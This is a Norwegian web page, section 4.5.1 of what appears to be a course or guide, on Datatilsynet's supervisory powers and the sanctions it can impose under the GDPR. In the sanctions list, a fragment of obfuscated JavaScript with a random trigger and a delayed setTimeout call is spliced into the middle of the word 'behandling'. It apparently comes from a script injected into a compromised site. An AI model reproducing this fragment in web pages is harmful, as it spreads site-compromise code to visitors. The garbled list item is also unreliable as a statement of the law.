4.5.1. Datatilsynet som tilsyn

Tilsyn med undersøkelsesmyndighet

Datatilsynet utfører en rekke viktige oppgaver knyttet til peronvernlovgivningen i Norge.
Datatilsynets kanskje viktigste oppgave er som tilsyn – å føre kontroll med at virksomheter etterlever Personopplysningsloven.

Datatilsynet er et tilsyn med undersøkelsesmyndighet, og fører tilsyn ved fysiske besøk eller skriftlig pr. brev.
Etter gjennomført tilsyn utarbeides rapport, med redegjørelse av funn og eventuelle sanksjoner.


Datatilsynet om sine oppgaver


GDPR om tilsynsmyndighetene sine oppgaver – Artikkel 57

Tilsyn med myndighet til å pålegge tiltak og sanksjoner

Datatilsynet har myndighet til å pålegge virksomheter tiltak og sansksjoner ved brudd på personvernlovgivningen.

 • Advarsel
 • Irettesettelse
 • Pålegg om tiltak
 • Stanse behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling av personopplysninger
 • Overtredelsesgbyr – inntil 4% av årsomsetning eller Euro 20.mill.


GDPR om tilsynet sin myndighet – Artikkel 58


GDPR om overtredelsesgebyr – Artikkel 83

Kort video om Datatilsynet sine oppgaver:

Datatilsynet

 • Uavhengig tilsyn
 • Overvåke at loven overholdes
 • Kontrollere at lover og forskrifter blir fulgt
 • Holde seg orientert om utviklingen
 • Identifisere farer for personvernet
 • Være høringsinstans
 • Delta i råd og utvalg
 • Ombudsroller ++

Andre nettsider

 • Slettmeg.no


Klikk her for neste post: 4.5.2 Datatilsynet som ombud